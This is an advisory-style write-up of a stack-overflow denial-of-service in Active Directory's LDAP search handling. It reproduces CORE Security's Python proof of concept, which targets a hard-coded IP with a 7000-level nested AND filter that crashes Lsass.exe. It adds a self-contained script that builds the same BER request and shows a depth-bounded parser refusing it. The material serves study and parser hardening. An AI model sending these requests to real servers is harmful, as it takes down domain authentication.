The LDAPv3 "search request" handling in Windows Active Directory does not correctly bounds-check user-supplied requests. A remote attacker can send a crafted search request that overflows the stack of the Lsass.exe process and crashes it.
Active Directory exposes its directory service over LDAP and uses the protocol to store and retrieve directory objects. The flaw lies in how Active Directory processes an LDAP "search request": if an attacker builds a search filter that nests more than 1000 "AND" operators and sends it to the server, parsing the filter overflows the stack and crashes the Lsass.exe service, which forces a restart within 30 seconds.
Attack:
CORE Security Technologies Advisories ([email protected]) provided the following test method.
The Python test script from the advisory is reproduced below:
------------------------------------
# Ldap (bindRequest, searchRequest, encapsulateHeader and the LDAP_FILTER_*
# tag constants) and the asn1 module come from CORE's own test harness,
# which the advisory does not reproduce.
class ActiveDirectoryDOS(Ldap):
    def __init__(self):
        self._s = None
        self.host = '192.168.0.1'
        self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
        self.port = 389
        self.buffer = ''
        self.msg_id = 1
        Ldap.__init__(self)

    def generateFilter_BinaryOp(self, filter):
        # filter = (tag, attribute, value) -> tag { OCTET STRING attr, OCTET STRING value }
        filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
        filterBuffer = self.encapsulateHeader(filter[0], filterBuffer)
        return filterBuffer

    def generateFilter_RecursiveBinaryOp(self, filter, numTimes):
        # wrap the leaf in numTimes nested ANDs: AND(AND(AND(leaf, leaf), leaf), ...)
        simpleBinOp = self.generateFilter_BinaryOp(filter)
        filterBuffer = simpleBinOp
        for cnt in range(0, numTimes):
            filterBuffer = self.encapsulateHeader(self.LDAP_FILTER_AND, filterBuffer + simpleBinOp)
        return filterBuffer

    def searchSub(self, filterBuffer):
        self.bindRequest()
        self.searchRequest(filterBuffer)

    def run(self, host='', basedn='', name=''):
        # the machine must not exist
        machine_name = 'xaxax'
        filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUAL, 'name', machine_name)
        # execute the anonymous query
        print('executing query')
        filterBuffer = self.generateFilter_RecursiveBinaryOp(filterComputerNotInDir, 7000)
        self.searchSub(filterBuffer)
------------------------------------
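As an added example (not the CORE script above and not code from the advisory), the following Python builds the same nested AND filter and a complete LDAP SearchRequest message by hand, and then walks the filter the way a recursive server-side parser would, once without any bound and once with a maximum nesting depth. The Ldap base class and asn1 module the CORE script relies on are not part of the page, so this block encodes the BER tags itself from RFC 4511. All names, the base DN, the depth bound of 64 and the use of Python's recursion limit as a stand-in for the LSASS thread stack are assumptions made for the demonstration; nothing is sent over the network.

```python
# Added example (not CORE's script): hand-rolled BER encoding of the nested
# AND filter the advisory describes, plus a bounded-depth filter walker.
# Everything is built in memory; nothing is sent to a server.
import sys

# LDAP tags from RFC 4511: and is [0] CONSTRUCTED (0xA0), equalityMatch is
# [3] CONSTRUCTED (0xA3), SearchRequest is [APPLICATION 3] CONSTRUCTED (0x63).
LDAP_FILTER_AND = 0xA0
LDAP_FILTER_EQUAL = 0xA3
LDAP_SEARCH_REQUEST = 0x63
ASN1_BOOL, ASN1_INT, ASN1_OCTET_STRING, ASN1_ENUM, ASN1_SEQ = 0x01, 0x02, 0x04, 0x0A, 0x30

# Python's default limit of 1000 frames stands in for the finite thread stack
# the AD parser ran out of (assumption); pin it so the demo is deterministic.
sys.setrecursionlimit(1000)


def ber_len(n):
    """BER length: short form below 128, long form (0x80|N followed by N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber_tlv(tag, payload):
    """Tag-Length-Value wrapper, the role encapsulateHeader plays in the CORE script."""
    return bytes([tag]) + ber_len(len(payload)) + payload


def octet_string(s):
    return ber_tlv(ASN1_OCTET_STRING, s.encode())


def equality_filter(attr, value):
    """equalityMatch ::= AttributeValueAssertion { attributeDesc, assertionValue }."""
    return ber_tlv(LDAP_FILTER_EQUAL, octet_string(attr) + octet_string(value))


def nested_and_filter(leaf, depth):
    """AND(AND(AND(leaf, leaf), leaf), ...) with `depth` levels, as in the advisory."""
    buf = leaf
    for _ in range(depth):
        buf = ber_tlv(LDAP_FILTER_AND, buf + leaf)
    return buf


def search_request(msg_id, base_dn, filt):
    """Wrap a filter in a full LDAPMessage { messageID, SearchRequest }.
    msg_id must stay below 128 so the INTEGER fits one byte (demo assumption)."""
    body = (octet_string(base_dn)                 # baseObject
            + ber_tlv(ASN1_ENUM, b"\x02")         # scope: wholeSubtree(2)
            + ber_tlv(ASN1_ENUM, b"\x00")         # derefAliases: neverDerefAliases(0)
            + ber_tlv(ASN1_INT, b"\x00")          # sizeLimit 0 (no limit)
            + ber_tlv(ASN1_INT, b"\x00")          # timeLimit 0 (no limit)
            + ber_tlv(ASN1_BOOL, b"\x00")         # typesOnly FALSE
            + filt                                # the filter under test
            + ber_tlv(ASN1_SEQ, b""))             # attributes: empty list
    return ber_tlv(ASN1_SEQ, ber_tlv(ASN1_INT, bytes([msg_id])) + ber_tlv(LDAP_SEARCH_REQUEST, body))


def parse_tlv(buf, pos=0):
    """Return (tag, payload, next_pos) for the TLV starting at pos."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


class FilterTooDeep(ValueError):
    pass


def filter_depth(buf, max_depth=None, _depth=1):
    """Recursive filter walk returning the nesting depth.  A server-side parser
    written this way recurses once per AND level, so with max_depth=None an
    attacker-chosen depth drives it into the stack; with a bound it refuses
    the request before the stack is consumed."""
    if max_depth is not None and _depth > max_depth:
        raise FilterTooDeep("filter nests deeper than %d" % max_depth)
    tag, payload, _ = parse_tlv(buf)
    if tag != LDAP_FILTER_AND:          # leaf (equalityMatch etc.)
        return _depth
    deepest, pos = _depth, 0
    while pos < len(payload):
        _, _, nxt = parse_tlv(payload, pos)
        deepest = max(deepest, filter_depth(payload[pos:nxt], max_depth, _depth + 1))
        pos = nxt
    return deepest


def check_filter(buf, max_depth=None):
    """'ok', 'rejected' (depth bound hit) or 'stack-exhausted' (the Python
    analogue of the Lsass.exe stack overflow)."""
    try:
        filter_depth(buf, max_depth)
        return "ok"
    except FilterTooDeep:
        return "rejected"
    except RecursionError:
        return "stack-exhausted"


if __name__ == "__main__":
    leaf = equality_filter("name", "xaxax")           # object that must not exist
    evil = nested_and_filter(leaf, 7000)              # same depth the CORE script uses
    print(len(search_request(1, "dc=example,dc=com", evil)), "byte SearchRequest")
    print("unbounded parser:", check_filter(evil))
    print("bounded parser:  ", check_filter(evil, max_depth=64))
```

Run directly, the unbounded walk fails with the Python analogue of the stack exhaustion while the bounded walk refuses the same filter. The point for anyone hardening a parser or writing a pre-filter in front of a directory server is that the limit has to apply to nesting depth before recursing, not to total request size: the 7000-level filter is only on the order of a hundred kilobytes, well inside what a normal search request may be.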